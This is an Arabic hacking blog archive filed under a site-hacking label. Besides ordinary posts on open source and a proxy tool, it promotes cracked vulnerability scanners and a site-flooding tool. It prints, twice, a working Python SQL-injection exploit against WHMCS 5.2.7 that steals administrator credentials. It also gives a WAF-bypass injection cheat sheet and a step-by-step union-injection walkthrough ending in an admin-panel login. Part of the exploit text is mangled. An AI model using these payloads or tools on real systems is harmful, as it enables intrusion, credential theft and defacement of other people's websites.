‏إظهار الرسائل ذات التسميات دعس المواقع. إظهار كافة الرسائل
‏إظهار الرسائل ذات التسميات دعس المواقع. إظهار كافة الرسائل
الثلاثاء، 18 مارس 2014

المصدر المفتوحOpen Source


المصدر المفتوح

المصدر المفتوح هو مصطلح يعبر عن مجموع من المبادىء التي تكفل الوصول إلى تصميم و إنتاج البضائع و المعرفة. يستخدم المصطلح عادة ليشير إلى شيفرات البرامج (الأكواد) المتاحة بدون قيود الملكية الفكرية. و هذا يتيح لمستخدمي البرمجيات الحرية الكاملة في الإطلاع على المصادر البرمجية للبرامج، و تعديها، وإضافة مزايا جديدة لها. ظهر مصطلح (Open Source) الذي يتم ترجمته للمصدر المفتوح، في نهاية التسعينات من قبل اريك ريموند (Eric Steven Raymond) في محاوله منه لإيجاد مصطلح بديل عن مصطلح برمجيات حرة(free software)الذي كان يفهم خطأ على أنه برمجيات مجانية بسبب اللبس الحاصل في معاني كلمة Free في اللغة الإنجليزية، كما في لغات أخرى كثيرة توجد كلمتان منفصلتان للتعبير عن ما هو مجاني (gratis) ما هو حر (libre). إذ كان قطاع الأعمال يتخوف من العمل في لينكس والبرمجيات الحرة، لأن كلمة (Free) كانت تعني لهم المجانية، وبالتالي عدم وجود أرباح، و لكن مع المصطلح الجديد قل هذا اللبس.
حاليا، يتم استعمال مصطلح البرمجيات المفتوحة المصدر في الإعلام بشكل أساسي، للدلالة على البرمجيات الحرة. لكن خلال تطور مفهوم المصدر المفتوح، قام بروس بيرنز بتطوير تعريف للبرمجيات المفتوحة المصدر.

التعريف

من الممكن اختصار تعريف البرمجيات المفتوحة المصدر، بأنها البرمجيات التي تحقق الشروط التالية:
  • حرية إعادة توزيع البرنامج.
  • توفر النص المصدري للبرنامج، وحرية توزيع النص المصدري.
  • حرية إنتاج برمجيات مشتقة أو معدلة من البرنامج الأصلي، وحرية توزيعها تحت نفس الترخيص للبرمجيات الأصلي.
  • من الممكن أن يمنع الترخيص توزيع النص المصدري للنسخ المعدلة على شرط السماح بتوزيع ملفات التي تحتوي على التعديلات بجانب النص الأصلي.
  • عدم وجود أي تمييز في الترخيص لأي مجموعة أو أشخاص.
  • عدم وجود أي تحديد لمجالات استخدام البرنامج.
  • الحقوق الموجودة في الترخيص يجب أن تعطى لكل من يتم توزيع البرنامجإليه.
هذه الميزات الأساسية لأي ترخيص من الممكن أن يطلق عليه ترخيص مفتوح المصدر.




منقول من الموسوعة الحرة wikipedia العربية .
السبت، 8 مارس 2014

طريقة الحصول على Cpanel مجانا و بمواصفات المدفوعة





الآن و حصريا . قررت أفضح لكم سر الحصول على Cpanel مجانا. نعم كلامي صحيح و هذه ليست أسطورة . 

الcpanel كالمدفوعه تماما حيث أنك تقدر ترفع عليها أي سكامة تريدها أنت و أيضا تدخل لها بوضع المسار /cpanel 

في موقعك وهي بكل مواصفات المدفوعه . لن نطول عليكم الموضوع بل سأضع لكم

رابط الموتقع المستعملة


لا تنسو مشاركة الشرح ليستفيد من اخرون

و لا تنسو تنشرو الموضوع ليستفيد الجميع ^_^

الثلاثاء، 4 مارس 2014

موقع تواصل اجتماعي منافس للفايسبوك 2014


موقع تواصل اجتماعي منافس للفايسبوك و مخصص لكل العرب بغاية إحداث نوع من التواصل البناء و قد ولدت الفكرة بعد تعنت 

موقع التواصل الاجتماعي الأول بالعالم الفيسبوك و بعد الأخطاء المهنية نظير إقفال العديد من المجموعات بدون سابق أنذار و ايظا 

سرقة و قرصنة العديد من حسابات زبائنها و سهولة اختراق معلومات مشاركيها


ويعد موقع التواصل الاجتماعي الجزائري من المواقع الآمنة و التي تضمن لزائرها حرية كامل في أبداء الرأي و تبادل المعلومات و 

الأخبار و سلاسة في التواصل وضمان لسرية المعلومات

رابط الموقع

سجل حتى لو بمعلومات وهمية شرح التسجيل





الاثنين، 17 فبراير 2014

حماية نفسك والتخفي في الانترنت بستعمال اداة squid


السلام عليكم 

طريقه اللي انا استخدمها في 

اخفاء نفسي من شركة الاتصالات..المهم موضوعنا الان عن اداه اسمها squid من اقوى الادوات اللتي 

تستخدم كبروكسي لحماية نفسك من التتبع trace ..ما اريد ان اطول الموضوع

نخش مباشره :

الاداه الرابط مباشره:

بالنسبه للمستخدمين انظمة اخرى غير نظام Ubuntu and backtrack انصحكم بزياره 


وتحميل الاداه من غير خلل

 او عن طريق الترمينال تكتب: apt-get install squid

السبت، 5 أكتوبر 2013

بعض البرامج لفحص وختراق المواقع

السلام عليكم بعض البرامج المساعده في اختراق المواقع

قم احد اعظاء الصفحة بأرسلها ونحن نشكره من اجل ذلك

وادعوكم الى عدم استعمالها فيما لا يرضي الله

الاول الاكونتكس الاصدار 8 لكشف الثغراث

شرح التفعيل


الثاني الاكونتكس الاصدار6 لكشف الثغراث



3 برنامج هافج لحقن قواعد البيانات


4 برنامج لوسي لضرب المواقع


5 نامب لفحص البورتات


6 برنامج نت سباركر لفحص الثغراث



7 برنامج شادو سكان لفحص الثغرث

ثغرة جديدة حقن في WHMCS


في ليلة امس تم اختراق العديد من المواقع وذلك بسبب ظهور ثغرة حقن WHMCS


الثغرة المستخدمة في الأختراقات القبلية [ Dev-Point - Trandit - الخ .. ]


كود البايثون : http://localhost.re/res/whmcs.py


مفهوم بسيط عنها : يجب تسجيل عضوية جديدة و الثغرة تسمح للعضوية بلحصول على صلاحيات root على السيرفر

بلأستطاعة السيطرة على مواقع كبيرة و ايضأ استضافات كبيرة بهاذه الثغرة ^

طريقة الحماية منها : http://www.gulfup.com/?GCc1Vp 




قواسم مشتركة بين المنتديات المخترقة 

كل المواقع تستخدم هاك vBSEO 

كل المواقع تقريبا علي داتا سنتر "softlayer" 

كل المواقع من الجيل الثالث لسكربت vb 


وهذه هي الثغرة


#!/usr/bin/env python
# 2013/10/03 - WHMCS 5.2.7 SQL Injection
# http://localhost.re/p/whmcs-527-vulnerability
url 'http://clients.target.com/' # wopsie dopsie user_email 'mysuper@hacker.account' # just create a dummie account at /register.php user_pwd 'hacker'import urllibresys
from urllib2 import Request
urlopen
ua 
"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17
Safari/537.36"
def exploit(sql):
print 
"Doing stuff: %s" sql
urlopen(Request('%sclientarea.php?action=details' urldata="token=%s&firstname=%s&lastname=1&companyname=1&email=%s&paymentmethod=none&billingcid
=0&address1=1&address2=1&city=1&state=1&postcode=1&country=US&phonenumber=1&save=Save+Ch
anges" 
% (user[1], 'AES_ENCRYPT(1,1), firstname=%s' sqluser_email), headers={"User-agent"ua"Cookie"user[0]})).read()
return 
re.search(r'(id="firstname" value="(.*?)")'r).group(2)def login():
print 
"Getting CSRF token" urlopen(Request('%slogin.php' urlheaders={"User-agent"ua})) csrf re.search(r'(type="hidden" name="token" value="([0-9a-f]{40})")'r.read()).group(2cookie r.info()['set-cookie'].split(';')[0]
print 
"Logging in" urlopen(Request('%sdologin.php' urldata="username=%s&password=%s&token=%s" %(user_emailuser_pwdcsrf), headers={"User-agent"ua"Cookie"cookie})).read()
if 
'dologin.php' in rsys.exit('Unable to login')
else:
return [
cookiere.search(r'(type="hidden" name="token" value="([0-9a-f]{40})")'r).group(2)]user login()
print 
exploit('(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)'# get admins print exploit('(SELECT * FROM (SELECT COUNT(id) FROM tblclients) as x)'# just get a count of clients

# oh you want to be evil
#exploit("'DISASTER', password=(SELECT * FROM (SELECT password FROM tblclients WHERE email='%s' LIMIT 1) as 
x)#" % user_email)  

وهذا ايظا


def exploit(sql):
print "Doing stuff: %s" % sql
r = urlopen(Request('%sclientarea.php?action=details' % url,
data="token=%s&firstname=%s&lastname=1&companyname=1&email=%s&paymentmethod=none&billingcid
=0&address1=1&address2=1&city=1&state=1&postcode=1&country=US&phonenumber=1&save=Save+Ch
anges" % (user[1], 'AES_ENCRYPT(1,1), firstname=%s' % sql, user_email), headers={"User-agent": ua,
"Cookie": user[0]})).read()
return re.search(r'(id="firstname" value="(.*?)")', r).group(2)

def login():
print "Getting CSRF token"
r = urlopen(Request('%slogin.php' % url, headers={"User-agent": ua}))
csrf = re.search(r'(type="hidden" name="token" value="([0-9a-f]{40})")',
r.read()).group(2)
cookie = r.info()['set-cookie'].split(';')[0]
print "Logging in"
r = urlopen(Request('%sdologin.php' % url, data="username=%s&password=%s&token=%s" %(user_email,
user_pwd, csrf), headers={"User-agent": ua, "Cookie": cookie})).read()
if 'dologin.php' in r:
sys.exit('Unable to login')
else:
return [cookie, re.search(r'(type="hidden" name="token" value="([0-9a-f]{40})")',
r).group(2)]

user = login()
print exploit('(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)') # get
admins
print exploit('(SELECT * FROM (SELECT COUNT(id) FROM tblclients) as x)') # just get a count of clients

# oh you want to be evil
#exploit("'DISASTER', password=(SELECT * FROM (SELECT password FROM tblclients WHERE email='%s' LIMIT 1) as
x)#" % user_email)

الجمعة، 4 أكتوبر 2013

جميع الاوامر التي تخص الحقن اليدوي مع samir soltani


samir soltani  قمت بوظع لجميع اوامر الحقن اليدوي
SqL Injection
أوامر تخطي
Forbidden 403
أوامر تخطي
Not Acceptable
أوامر التـشفــيــر أثناء الحقن
أوامر تخطي عدم ظهور عدد الأعمدة
==============================
أوامر SqL Injection
==============================
أمر استخراج عدد الأعمدة
==============================
+order+by+
==============================
أمر استخراج العامود المصاب
==============================
+union+select+
==============================
أمر استخراج اسم قاعدة البيانات
==============================
Database()
==============================
أمر استخراج اصدار قاعدة البيانات
==============================
Version()
==============================
أمر استخراج يوزر قاعدة البيانات
User()
==============================
أمر استخراج الجداول
==============================
يوضع هذا الأمر مكان العامود المصاب
==============================
group_concat(table_name)
==============================
ويوضع هذا الأمر في نهاية الرابط
==============================
+from+information_schema.tables+where+table_schema =database()--
==============================
أمر استخراج الأعمدة
==============================
يوضع هذا الأمر مكان العامود المصاب
==============================
group_concat(column_name)
==============================
ويوضع هذا الأمر في نهاية الرابط
==============================
+from+information_schema.columns+where+table_schem a=database()--
==============================
أوامر تخطي Forbidden 403 اثناء استخراج العامود المصاب + استخراج الجداول ولأعمدة
==============================
تخطي Forbidden 403 اثناء استخراج العامود المصاب
==============================
اضافة الفلتر
==============================
/*! */
==============================
على كلمة
==============================
select
==============================
لتصبح بهذا الشكل
==============================
/*!select*/
==============================
واذا لم تنجح الطريقة العب بكلمة
==============================
select
==============================
لتصبح بهذا الشكل
==============================
/*!SeLeCt*/
==============================
احرف سمول وأحرف كابتل
==============================
تخطي Forbidden 403 اثناء استخراج الجداول
==============================
التعديل بالأمر
==============================
select
==============================
ليصبح بهذا الشكل
==============================
/*!SeLeCt*/
==============================
التعديل بالأمر
==============================
group_concat(table_name)
==============================
ليصبح بهذا الشكل
==============================
/*!GrOuP_CoNcAT(table_name)*/
==============================
وتعديل الامر
==============================
ليصبح بهذا الشكل
==============================
+from+information_schema.tables+where+table_schema =database()--
==============================
تخطي Forbidden 403 اثناء استخراج الجداول
==============================
التعديل بالأمر
==============================
select
==============================
ليصبح بهذا الشكل
==============================
/*!SeLeCt*/
==============================
التعديل بالأمر
==============================
group_concat(column_name)
==============================
ليصبح بهذا الشكل
==============================
/*!GrOuP_CoNcAT(column_name)*/
==============================
وتعديل الامر
==============================
ليصبح بهذا الشكل
==============================
+from+information_schema.columns+where+table_schem a=database()--
==============================
ليصبح بهذا الشكل
==============================
+
==============================
from+information_schema./*!columns*/+where+table_schema=database()--
==============================
أوامر تخطي Not Acceptable
==============================
تخطي Not Acceptable اثناء استخراج العامود المصاب
==============================
اضافة الفلتر
==============================
/*! */
==============================
على كلمة
==============================
select
==============================
لتصبح بهذا الشكل
==============================
/*!select*/
==============================
واذا لم تنجح الطريقة العب بكلمة
==============================
select
==============================
لتصبح بهذا الشكل
==============================
/*!SeLeCt*/
==============================
احرف سمول وأحرف كابتل
==============================
تخطي
Not Acceptable
اثناء استخراج الجداول
==============================
التعديل بالأمر
==============================
select
==============================
ليصبح بهذا الشكل
==============================
/*!SeLeCt*/
==============================
التعديل بالأمر
==============================
group_concat(table_name)
==============================
ليصبح بالشكل دا
==============================
/*!GrOuP_CoNcAT(table_name)*/
==============================
تخطي Not Acceptable اثناء استخراج الجداول
==============================
التعديل بالأمر
==============================
select
==============================
ليصبح بهذا الشكل
==============================
/*!SeLeCt*/
==============================
التعديل بالأمر
==============================
group_concat(column_name)
==============================
ليصبح بالشكل دا
==============================
/*!GrOuP_CoNcAT(column_name)*/
==============================
أوامر تخطي الحماية من بعض الأوامر
==============================
هذا الأمر نضعه مكان العامود المصاب
==============================
concat(unhex(hex(concat(table_name,0x3a,column_nam e,0x3a,table_schema))))
==============================
وهذا الأمر نضعه في نهاية الرابط
==============================
+from+information_schema.columns--
==============================
أوامر تخطي عدم ظهور عدد الأعمدة
==============================
نقوم باضافة
==============================
+--+
==============================
في نهاية الرابط
==============================
واضافة
العلامة التي بين قوسين
==============================
(')
==============================
بعد
==============================
.php?id=1
==============================
ليصبح بهذا الشكل
==============================

.php?id=1'
الخميس، 19 سبتمبر 2013

الحقن اليدوي


 



السلام عليكم معكم        samirsoltani


         
تم اعادة الدرس بناء على رغبة صديقي         
هہيہثہم فہرنہسہآ
                       اعادة لشرح استغلال ثغرة SQL يدويا


samirsoltani
   ليس موقع حقيق تم وضعه للشرح فقط   
كود PHP:
http://www.samirsoltani.org/news/showevent.php?id=2 

ح الاستغلال كدا

كود PHP:
 http://www.samirsoltani.org/news/showevent.php?id=2' 


حلو جدا انا  اعرف عدد الجداول الموجوده وش اسوي 

راح نستخدم امر 

order+by

 يكون هكذا الاستغلال

كود PHP:
http://www.samirsoltani.org/news/showevent.php?id=-2+order+by+6-- 

كدا حلو ما ظهر لنا خطأ 

يبقي عدد 6 في الجداول موجود 


طيب الحين نزود عدد 6 الى 7 و 8 لحد ما يظهر لنا الخطأ 

طيب الحين نزود عدد ليصبح عدد الجداول 7

كود PHP:
http://www.samirsoltani.org/news/showevent.php?id=-2+order+by+7-- 

ظهر لنا الخطأ 


وكدا نعلم ان عدد الجداول المصابه في الموقع هم 6 لان الموقع اشتغل عند هذا العدد

الحين نستخدم امر union+select لكي نظهر الجداول المصابه بالموقع

ونضع عدد الجداول الى هم + وراح يصبح الاستغلال كدا

كود PHP:
http://www.samirsoltani.org/news/showevent.php?id=-2+union+select+1,2,3,4,5,6-- 

يجب ان 

لا ننس ان نضع علامه - قبل الرقم المتغير الى هوه رقم 2 


حلو الحين عندنا الجدول رقم 3 ورقم 4 مصابين كما بالصوره 

الحين نشوف اصدار القاعده 

نضع امر version() في العمود المصاب 

هذا استغلال بسيط

كود PHP:
http://www.samirsoltani.org/news/showevent.php?id=-2+union+select+1,2,3,version(),5,6-- 

حلو 

الحين جدا ظهر لنا الاصدار الخامس  


احسن شيئ في الاصدار الخامس ممكن تطلع اسماء الجداول من غير ما تخمن وهذي الميزه حلوه جدا

حلو الحين راح نستخدم امر الاستعلام هذا

كود PHP:
+from+information_schema.columns+WHERE+column_nam e+LIKE

امسح المسافات من كلمه نيم
بعد كلمه Like راح نضيف تشفير الى بدينا نبحث عنه داخل قواعد البينات 

وراح ارفق لكم بعض التشفيرات 

وراح نضع في العمود المصاب 

هذا الاستعلام 

concat(table_nam e,0x3e,column_nam e,0x3e,table_schema)

امسح المسافات من كلمه نيم

الحين بيصبح الاستغلال 

كدا

كود PHP:
http://www.samirsoltani.org/news/showevent.php?id=-2+union+select+1,2,3,concat(table_nam e,0x3e,column_nam e,0x3e,table_schema),5,6+from+information_schema.columns+WHERE+column_nam e+LIKE+char(37, 112, 97, 115, 115, 37)-- 

امسح المسافات من كلمه نيم
طبعا التشفير الموجود بعد كلمه Like هوه لكلمه %pass%

وهذي العلامه % تعني ان ممكن يكون اسمه قبل pass او بعده 

والتشفير

كود PHP:
char(371129711511537

هوه الى راح نغيرو للبحث بأسماء 

اخري مثل %user% و %login% و %admin% تم وضع مرفقات مع الدرس

وهكذا بعد ما كتبنا الاستغلال نشوف وش النتيجه 


حلو تم استخراج البينات المطلوبه 

admin>password>nyucssamember

admin : اسم الجدول 

Password : ام العمود

الحين نروح نستخدم البينات الى احنا طلعناها علشان نجيب اسم اليوزر حقت الادمن والباسورد

رجع لاظهاء الجداول المصابه مره اخري

كود PHP:
http://www.samirsoltani.org/news/showevent.php?id=-2+union+select+1,2,3,4,5,6-- 

الحين نستخدم امر 

+from+اسم الجدول --

وفي العمود المصاب نضع password الى استخرجناها 

والجدول طبعأ بيكون admin

يعني يصبح هكذا

كود PHP:
http://www.samirsoltani.org/news/showevent.php?id=-2+union+select+1,2,password,4,5,6+From+admin-- 

جيد

جدا الان الاتغلال ظهر لنا الباسورد الى احنا طلبناه حق الادمن 


والباسورد هوه algeria

طيب الحين نجرب نفس الاستغلال ونبدأ password بـ usernam eعلشان نطلع يوزر 

الادمن
اليوزر هو samir

طيب الحين كل شيئ تمام الان نروح للوحه الموقع وانت الى عليك تخمنها 

احيانا بتكون 

admin.php

login.php

control.php

ومسار اللوحه

كود PHP:
http://www.samirsoltani.org/news/login.php? 

الحين معنا اليوزر والباس ندخلهم

ونضغط login 

طيب حلو اكيد كل موقع واللوحه حقو تختلف عن الاخري 

الان نذهب للاخبار = news 

ونضغط Edit
ولان ندخل ونجرب على الموقع المستهذف


الأربعاء، 18 سبتمبر 2013

أداة إضعاف المواقع من صنع مجموعة Virus Alert




الطريقة سهلة للتعامل مع هده الأداة أولا قم بتحميلها من هنا
تم إتبع الخطوات كما في الشرح على الصور
  

أترك العملية كما هي و بعد قليل إتجه للموقع و ستجده كما في الصورة